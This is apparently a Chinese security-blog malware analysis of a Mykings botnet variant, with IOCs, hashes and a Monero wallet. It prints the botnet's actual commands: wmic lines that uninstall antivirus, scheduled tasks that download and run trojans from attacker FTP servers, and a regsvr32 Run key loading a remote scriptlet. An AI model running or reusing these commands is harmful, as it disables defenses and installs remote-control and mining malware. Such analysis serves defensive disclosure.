Mykings僵尸网络新变种已感染超5万台电脑

2020-10-27 16:34:49 浏览数 (1)

一、背景

更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。

Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。

MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。

二、样本分析

mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。

Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括:

uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe

删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。

2.1持久化

Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。

  • 卸载指定杀毒软件;

wmic.exe product where “name like ‘%Eset%’” call uninstall /nointeractive

wmic.exe product where “name like ‘%%Kaspersky%%’” call uninstall /nointeractive

wmic.exe product where “name like ‘%avast%’” call uninstall /nointeractive

wmic.exe product where “name like ‘%avp%’” call uninstall /nointeractive

wmic.exe product where “name like ‘%Security%’” call uninstall /nointeractive

wmic.exe product where “name like ‘%AntiVirus%’” call uninstall /nointeractive

wmic.exe product where “name like ‘%Norton Security%’” call uninstall /nointeractive

cmd /c “C:Progra

1MalwarebytesAnti-Malwareunins000.exe” /verysilent /suppressmsgboxes /norestart

2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe;

代码语言:javascript复制
schtasks /create /tn “oka” /tr “cmd /c start c:windowsinfaspnetlsma12.exe -p” /ru “system” /sc onstart /Fwmic.exe process where ExecutablePath=’c:windowsjavajava.exe’ call Terminate

3、安装计划任务”Mysa”、”Mysa2”,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行;

代码语言:javascript复制
schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s
echo test>>s
echo 1433>>s
echo binary>>s
echo get a1.exe c:windowsupdate.exe>>s
echo bye>>s
ftp -s:s
c:windowsupdate.exe” /ru “system” /sc onstart /F
schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps
echo test>>ps
echo 1433>>ps
echo get s1.rar c:windowshelplsmosee.exe>>ps
echo bye>>ps
ftp -s:ps
c:windowshelplsmosee.exe” /ru “system” /sc onstart /F

4、设置拒绝“system”用户访问指定文件和路径;

代码语言:javascript复制
cacls c:windowsjavajava.exe /e /d system
cacls c:windowstempservtestdos.dll /e /d system
cacls C:WINDOWSFontscd /e /d system

5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。

代码语言:javascript复制
reg add “HKLMSoftwareMicrosoftWindowsCurrentVersionRun” /v “start” /d “regsvr*32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f
reg add “HKLMSoftwarewow6432nodeMicrosoftWindowsCurrentVersionRun” /v “start” /d “regsvr*32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f
reg delete HKlmSoftwareMicrosoftWindowsCurrentVersionRun /v “start1” /f
SCHTASKS /Delete /TN “Mysa3” /F
SCHTASKS /Delete /TN “ok” /F
SCHTASKS /Delete /TN “Mysa1” /F
SCHTASKS /Delete /TN “my1” /F

6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本:

代码语言:javascript复制
http[:]//ruisgood.ru/power.txt
http[:]//gamesoxalic.com/power.txt

或者通过regsvr*32下载和执行脚本:

代码语言:javascript复制
http[:]//ruisgood.ru/s.txt
http[:]//gamesoxalic.com/s.txt

7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序:

8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序:

2.2自更新

Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括:

c:windowstempntuser.dat

c:windowstempupx.exe

%temp%c3.bat

%temp%excludes

%temp%n.vbs

Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下:

首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。

然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=&info=)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。

2.3 PcShare远控木马

返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至:

c:windowsdebugitem.dat,启动命令为:

rundll32.exe c:windowsdebugitem.dat,ServiceMain aaaa。

PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。

1.枚举、创建、重命名、删除文件和目录

2.枚举和终止进程

3.编辑注册表项和值

4.枚举和修改服务

5.枚举和控制窗口

6.执行二进制文件

7.从C&C或提供的URL下载其他文件

8.将文件上传到C&C

9.执行shell命令

10.显示消息框

11.重新启动或关闭系统

PcShare连接C2服务器:192.187.111.66:5566。

2.4挖矿

Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程:

c:windowsinfaspnetlsma12.exe

挖矿时使用矿池:xmr-eu1.nanopool.org:14444

门罗币钱包:

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka

查询该钱包,已挖矿获得143个XMR,折合¥8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。

IOCs

C&C

192.187.111.66:5566

95.214.9.95

Domain

ruisgood.ru

ftp.ftp0801.ru

gamesoxalic.com

ftp.ftp0930.host

js.down0116.info

js.mys2016.info

wmi.1217bye.host

js.5b6b7b.ru

up.mykings.pw

kriso.ru

f321y.com

down.f4321y.com

IP

199.168.100.74

173.247.239.186

174.128.235.243

223.25.247.152

167.88.180.175

139.5.177.10

173.247.239.186

185.239.227.82

URL

http[:]//ruisgood.ru/ups.dat

http[:]//ruisgood.ru/power.txt

http[:]//ruisgood.ru/1201.rar

http[:]//ruisgood.ru/uninstall.txt

http[:]//ruisgood.ru/max.rar

http[:]//ruisgood.ru/config2.json

http[:]//ruisgood.ru/s.txt

http[:]//ruisgood.ru/upx.exe

http[:]//ruisgood.ru/s.xsl

http[:]//ruisgood.ru/download2.txt

http[:]//ruisgood.ru/batpower.txt

http[:]//ruisgood.ru/ups.dat

http[:]//ruisgood.ru/download.txt

http[:]//ruisgood.ru/kill.txt

http[:]//ruisgood.ru/up.txt

http[:]//ruisgood.ru/wmi.txt

http[:]//ruisgood.ru/batpower.tx

http[:]//ruisgood.ru/up2.txt

http[:]//gamesoxalic.com/power.txt

http[:]//gamesoxalic.com/s.txt

ftp[:]//199.168.100.74/aa.exe

ftp[:]//199.168.100.74/1.dat

ftp[:]//ftp.ftp0801.ru/1.dat

ftp[:]//ftp.ftp0801.ru/aa.exe

ftp[:]//ftp.ftp0930.host/a1.exe

ftp[:]//ftp.ftp0930.host/s1.rar

http[:]//js.down0116.info:280/v1.sct

http[:]//174.128.235.243/wmi.txt

http[:]//174.128.235.243/upsupx2.exe

http[:]//174.128.235.243/u.exe

http[:]//199.168.100.74/20200809.rar

http[:]//199.168.100.74:8074/1201.rar

http[:]//173.247.239.186:9999/max.exe

http[:]//173.247.239.186:9999/u.exe

http[:]//185.239.227.82:8082/2.exe

http[:]//wmi.1217bye.host/S.ps1

http[:]//95.214.9.95/pld/cmd.txt

http[:]//223.25.247.152:8152/batpower.txt

http[:]//167.88.180.175:8175/kill.txt

http[:]//167.88.180.175:8175/uninstall.txt

http[:]//139.5.177.10:280/psa.jpg

http[:]//199.168.100.74/2.exe

http[:]//199.168.100.74:8074/2.exe

http[:]//173.247.239.186/2.exe

http[:]//185.239.227.82:8082/2.exe

http[:]//173.247.239.186:9999/2.exe

http[:]//js.5b6b7b.ru/v.sct

http[:]//js.5b6b7b.ru:280/v.sct

http[:]//up.mykings.pw/update.txt

http[:]//kriso.ru/java12.dat

http[:]//js.ftp0930.host/helloworld.msi

http[:]//f321y.com:8888/dhelper.dat

http[:]//down.f4321y.com:8888/kill.html

md5

20200809.rar

dce4ac18798ea897cdc9e09e06b178be

max.rar

bc7fc83ce9762eb97dc28ed1b79a0a10

u.exe

d9c32681d65c18d9955f5db42154a0f3

ups.dat

d1f978c88023639d6325805eb562de8c

upsupx2.exe

b5cd8af63e35db23eb1c6a4eb8244c45

address.txt

83bdb3a6fb995788de262b22919524f1

cloud.txt

6b9b70f4e0c8885d12169045e906d698

cmd.txt

6def7a0c5707f24a912c79f6520ca86f

kill.txt

1573ab993edc98decc09423fd82ec5ed

micro

f0129d85b17ee4d29ef52c63e0e548a4

power.txt

5670f0839333e4b160be05177601b40c

uninstall.txt

6092899216610fea5c65e416b34c1777

update.txt

581a86fea2afeb9b9d6d04c9a8f0a5c1

wmi.txt

6afc95f60630a588a7826608c70a60c8

wpd.jpg

bbae338b0cac5a2d169b8c535f33bfa0

batpower.txt

40160c782c2a41eed8d8eaf0c706050a

up.txt

6c190a44db2118d9c07037d769e0a62d

ups.txt

f41a8a69361fccc13344493c04a4f0d8

s.ps1

966abd05b7ad1b0b89d2a846f8a5a8f2

testav.dat

d4f7a3f44ae3f21863b1440219388a5b

psa.jpg

9cb1c1a78ce3efe57eef5f128b43710a

门罗币钱包:

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka

参考链接:

https://www.freebuf.com/articles/193260.html

https://www.freebuf.com/articles/network/161286.html

https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware

0 人点赞